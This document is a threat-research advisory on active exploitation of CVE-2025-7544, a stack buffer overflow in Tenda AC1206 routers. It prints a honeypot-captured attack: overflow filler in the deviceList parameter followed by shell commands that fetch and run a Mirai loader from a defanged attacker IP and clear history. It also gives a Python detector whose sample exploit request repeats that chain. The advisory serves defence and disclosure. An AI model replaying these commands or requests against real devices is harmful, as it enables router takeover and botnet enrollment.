
The SonicWall Capture Labs threat research team has identified active exploitation attempts targeting CVE-2025-7544, a critical stack-based buffer overflow vulnerability affecting Tenda AC1206 routers running firmware version 15.03.06.23.
The vulnerability exists within the router’s MAC filtering configuration and can be triggered via the /goform/setMacFilterCfg endpoint through improper handling of the deviceList parameter. Successful exploitation can allow an attacker to execute arbitrary code on the device.
While public proof-of-concept (PoC) information has been available since disclosure, the SonicWall Capture Labs threat research team has observed active exploitation attempts targeting internet-facing Tenda devices. Analysis of the observed attack chain shows threat actors leveraging the vulnerability to download and execute a malicious shell script that establishes persistence and deploys architecture-specific payloads.
The malware's behavior, including multi-architecture payload delivery, automated persistence installation, and botnet enrollment, is consistent with techniques commonly used by Mirai-derived IoT botnets.
The observed activity demonstrates that attackers have progressed beyond proof-of-concept testing and are actively weaponizing CVE-2025-7544 as an initial access vector for compromising vulnerable routers and incorporating them into broader botnet infrastructure.
CVE-2025-7544 has been assigned a CVSS v3.1 score of 8.8 (High).
| Field | Value |
|---|---|
| Vulnerability | CVE-2025-7544 |
| CVSS Score | 8.8 (High) |
| Vulnerability Type | Stack-Based Buffer Overflow |
| CWE | CWE-121 |
| Attack Vector | Network |
| User Interaction | None |
| Privileges Required | Low |
| Affected Product | Tenda AC1206 |
| Affected Version | Firmware 15.03.06.23 |
The vulnerability resides within the formSetMacFilterCfg() function responsible for processing MAC address filtering configurations through the router’s web management interface.
The vulnerable endpoint accepts user-supplied input through the deviceList parameter:
```
POST /goform/setMacFilterCfg HTTP/1.1
```
Insufficient bounds checking allows an attacker to submit an oversized value that is copied into a stack-allocated buffer. A stack-based buffer overflow occurs when data written to a buffer exceeds the allocated memory region and begins overwriting adjacent stack structures. By overwriting saved frame pointers and return addresses, this can redirect program execution.
Because the vulnerable endpoint is accessible through the management interface, exploitation can be performed remotely against exposed devices.
The SonicWall Capture Labs threat research team has observed exploitation attempts targeting vulnerable Tenda devices.
The following request was captured by a honeypot sensor:

The attack begins with a large sequence of repeated “A” characters:
```
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
```
This pattern is commonly used to overwrite stack memory and reach critical control structures such as saved frame pointers and return addresses.
The excessive size of the deviceList parameter is consistent with public descriptions of CVE-2025-7544 and demonstrates an attempt to trigger the underlying stack-based buffer overflow.
Following the overflow data, the attacker appends shell commands designed to retrieve and execute a remote payload:
```
chmod 777 /bin/wget;
chmod 777 /bin/curl;
wget hxxp://103[.]226[.]139[.]102/wawan.sh -O wawan.sh;
chmod 777 wawan.sh;
./wawan.sh;
rm -rf wawan.sh;
history -c
```
The commands perform the following actions:
| Command | Description |
|---|---|
| chmod 777 /bin/wget | Ensure wget is executable |
| chmod 777 /bin/curl | Ensure curl is executable |
| wget hxxp://103[.]226[.]139[.]102/wawan.sh | Download attacker payload |
| chmod 777 wawan.sh | Make payload executable |
| ./wawan.sh | Execute downloaded malware |
| rm -rf wawan.sh | Remove evidence |
| history -c | Clear command history |
The sequence indicates an automated infection workflow intended to compromise the router and deploy additional malware components.
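The following detection logic is an added example, not code from the advisory or from SonicWall: it parses a raw HTTP request to the vulnerable endpoint and flags the three traits of the capture described above (an oversized deviceList, a long run of identical filler bytes, and an appended shell command sequence). The sample requests, the 256-byte threshold and the 64-byte run length are constructed assumptions; the host is kept defanged exactly as the advisory prints it.

```python
import re
from urllib.parse import unquote_plus

VULN_PATH = "/goform/setMacFilterCfg"
MAX_DEVICELIST_LEN = 256  # assumed threshold; a legitimate MAC list stays well below this
# Shell-command sequences of the kind appended after the overflow filler in the capture
SHELL_PATTERN = re.compile(
    r"(?:^|[;|&`\n])\s*(?:chmod|wget|curl|rm|history|sh)\b|/bin/(?:wget|curl)|\bhxxps?://|\bhttps?://"
)

# Constructed sample modelled on the honeypot capture; filler length is synthetic.
SAMPLE_EXPLOIT = (
    "POST /goform/setMacFilterCfg HTTP/1.1\r\nHost: 192.0.2.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "deviceList=" + "A" * 600 +
    ";chmod 777 /bin/wget;chmod 777 /bin/curl;"
    "wget hxxp://103[.]226[.]139[.]102/wawan.sh -O wawan.sh;"
    "chmod 777 wawan.sh;./wawan.sh;rm -rf wawan.sh;history -c"
)
# Constructed benign request: one MAC address in the filter list.
SAMPLE_BENIGN = (
    "POST /goform/setMacFilterCfg HTTP/1.1\r\nHost: 192.0.2.1\r\n\r\n"
    "deviceList=AA:BB:CC:DD:EE:FF"
)

def parse_request(raw):
    """Split a raw HTTP request into (method, path, form parameters)."""
    head, _, body = raw.partition("\r\n\r\n")
    method, path, _ = head.split("\r\n", 1)[0].split(" ", 2)
    params = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return method, path, params

def inspect_request(raw):
    """Return a list of findings for a setMacFilterCfg POST; empty means nothing suspicious."""
    method, path, params = parse_request(raw)
    if method != "POST" or path.split("?")[0] != VULN_PATH:
        return []
    device_list = params.get("deviceList", "")
    findings = []
    if len(device_list) > MAX_DEVICELIST_LEN:
        findings.append(f"oversized deviceList ({len(device_list)} bytes)")
    if re.search(r"(.)\1{63,}", device_list):  # 64+ identical bytes: overflow filler
        findings.append("repeated-byte filler in deviceList")
    if SHELL_PATTERN.search(device_list):
        findings.append("shell command sequence in deviceList")
    return findings

if __name__ == "__main__":
    for name, req in (("exploit", SAMPLE_EXPLOIT), ("benign", SAMPLE_BENIGN)):
        print(name, inspect_request(req) or "clean")
```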
The observed attack follows a common IoT malware deployment process:

Unlike traditional proof-of-concept exploits that simply demonstrate a crash condition, the observed activity shows clear post-exploitation objectives focused on establishing persistent malware execution.
The attack infrastructure hosts a shell script named:
wawan.sh
The script is downloaded from:
hxxp://103[.]226[.]139[.]102/wawan.sh
Threat actors frequently use shell scripts as lightweight first-stage loaders because they can quickly determine device architecture and then download architecture-specific malware binaries.
Analysis of the downloaded payload revealed the following malware sample:
| Artifact | Value |
|---|---|
| SHA256 | e62e1444fe68b124875a7cdc86cbfc1aefb06c128b6b48e27d0c45f24403d6fc |
VirusTotal analysis shows that multiple security vendors classify the sample as malicious and associate it with Linux malware and the Mirai botnet. Its relationship analysis further indicates that the loader retrieves additional payloads from:
hxxp://103[.]226[.]139[.]102/terrabot/
Observed payloads include architecture-specific binaries targeting ARM, MIPS, PowerPC, SPARC, and x86-based systems. The use of dedicated malware-hosting infrastructure and multi-architecture payloads suggests a mature and automated botnet deployment operation.
To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signature has been released:
| Signature ID | Signature Name |
|---|---|
| IPS 21995 | Tenda AC1206 Buffer Overflow |
| GAV | Mirai |
| GAV | Dropper.TRB |
Successful exploitation of CVE-2025-7544 could allow attackers to:
Because routers frequently occupy trusted positions within enterprise and home networks, successful compromise can provide attackers with valuable network visibility and additional attack opportunities.
Organizations using Tenda AC1206 devices should:
Organizations should assume internet-exposed vulnerable devices are at elevated risk due to the availability of public exploit information and observed in-the-wild exploitation activity.
An Article By
Ashwini Bhagwat